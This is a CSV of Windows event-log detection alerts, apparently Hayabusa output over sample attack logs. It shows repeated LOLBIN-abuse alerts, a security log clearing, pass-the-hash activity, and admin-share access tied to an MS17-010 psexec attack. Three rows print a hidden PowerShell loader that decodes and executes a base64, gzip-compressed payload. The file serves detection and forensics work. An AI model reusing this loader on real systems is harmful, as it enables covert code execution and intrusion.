2021-04-22 00:03:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x14bc | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:03:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x14bc | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:04:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x125c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:04:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x125c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:05:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13e0 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:05:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13e0 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:06:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1460 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:06:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1460 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:07:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x958 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:07:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x958 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:08:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:08:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:09:03.005 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x164 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:09:03.005 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x164 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:10:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xd54 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:10:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xd54 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:11:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1268 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:11:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1268 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:12:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1380 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:12:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1380 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:13:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xf24 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:13:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xf24 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:14:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xff8 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:14:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xff8 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:15:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x17f0 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:15:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x17f0 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:16:03.002 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xc8c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:16:03.002 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xc8c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:17:03.011 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:17:03.011 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:18:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xea4 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:18:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xea4 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:19:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:19:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 17:50:53.614 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x74872,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: 0Konuy9q8HtkWeKS | IP Addr: 10.23.123.11 | LID: 0x74872,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x74872,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: FS03VULN$ | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: FS03VULN$ | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:04.796 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: FS03VULN$ | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:04.851 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03VULN$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:04.851 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7f0 | User: FS03VULN$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:05.633 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('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'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f0 | User: FS03VULN$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x76e83,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x76e83,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
